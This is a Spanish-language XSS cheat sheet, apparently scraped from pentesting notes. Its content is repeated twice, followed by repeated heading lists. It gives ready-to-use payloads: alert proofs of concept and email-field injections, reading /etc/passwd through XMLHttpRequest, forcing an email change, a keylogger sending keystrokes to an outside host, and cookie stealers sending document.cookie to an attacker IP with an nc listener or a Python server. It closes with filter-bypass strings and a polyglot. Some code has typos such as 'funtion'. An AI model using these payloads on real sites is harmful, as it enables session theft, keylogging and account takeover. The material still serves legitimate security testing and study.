XSS

I am the xssrat

Simple XSS PoC:

<script>alert('uwu')</script>

XSS en campo EMAIL:

test+(<script>alert(uwu)</script>)@email.com
test@email(<script>alert(uwu)</script>).com
"<script>alert(uwu)</script>"@email.com

Leer Archivos Locales:

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
http://x.open("GET","file:///etc/passwd");x.send();
</script>

DOM XSS

?parametro=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Cambiar Email:

<script>user.changeEmail('attacker@email.com');</script>

Key Logger

<script>document.onkeypress = funtion(e) {fetch('https://web.com/log?key=' +btoa(e.key));}</script>

----------------------------------------------------------------------------

nc -lvnp 1234
<script>fetch('http://<IPa>:1234?cookie=' + btoa(document.cookie) );</script>

dev tool > STORAGE > HTTPonly en FALSE para funcionar

python3 -m http.server 80
<script>var i=new Image;i.src="http://<IPa>"+document.cookie;</script>

----------------------------------------------------------------------------------------

Filter Bypass:

XSS Polyglot:

JavaScript://%250Aalert?.(uwu)//'/*\'/*"/*\"/*/*\/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(uwu)}//><Base/Href=//X55.is\76-->

Cerrando Tags:

"><script>alert('uwu');</script>

JS code:

';alert('uwu');//

Script banned:

<sscriptcript>alert('uwu');</sscriptcript>

‘<>’ Banned:

# En atributo de tab "IMG"
onload="alert('uwu');

AnteriorXXE SiguienteSQLi

Última actualización hace 1 año

XSS

I am the xssrat

Simple XSS PoC:

<script>alert('uwu')</script>

XSS en campo EMAIL:

test+(<script>alert(uwu)</script>)@email.com
test@email(<script>alert(uwu)</script>).com
"<script>alert(uwu)</script>"@email.com

Leer Archivos Locales:

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
http://x.open("GET","file:///etc/passwd");x.send();
</script>

DOM XSS

?parametro=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Cambiar Email:

<script>user.changeEmail('attacker@email.com');</script>

Key Logger

<script>document.onkeypress = funtion(e) {fetch('https://web.com/log?key=' +btoa(e.key));}</script>

----------------------------------------------------------------------------

nc -lvnp 1234
<script>fetch('http://<IPa>:1234?cookie=' + btoa(document.cookie) );</script>

dev tool > STORAGE > HTTPonly en FALSE para funcionar

python3 -m http.server 80
<script>var i=new Image;i.src="http://<IPa>"+document.cookie;</script>

----------------------------------------------------------------------------------------

Filter Bypass:

XSS Polyglot:

JavaScript://%250Aalert?.(uwu)//'/*\'/*"/*\"/*/*\/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(uwu)}//><Base/Href=//X55.is\76-->

Cerrando Tags:

"><script>alert('uwu');</script>

JS code:

';alert('uwu');//

Script banned:

<sscriptcript>alert('uwu');</sscriptcript>

‘<>’ Banned:

# En atributo de tab "IMG"
onload="alert('uwu');

AnteriorXXE SiguienteSQLi

Última actualización hace 1 año

Simple XSS PoC:

XSS en campo EMAIL:

Leer Archivos Locales:

DOM XSS

Cambiar Email:

Key Logger

Cookie Stealers:

Cookie Steal en escucha:

Cookie Steal - Python Server:

Filter Bypass:

XSS Polyglot:

Cerrando Tags:

JS code:

Script banned:

‘<>’ Banned:

Simple XSS PoC:

XSS en campo EMAIL:

Leer Archivos Locales:

DOM XSS

Cambiar Email:

Key Logger

Cookie Stealers:

Cookie Steal en escucha:

Cookie Steal - Python Server:

Filter Bypass:

XSS Polyglot:

Cerrando Tags:

JS code:

Script banned:

‘<>’ Banned: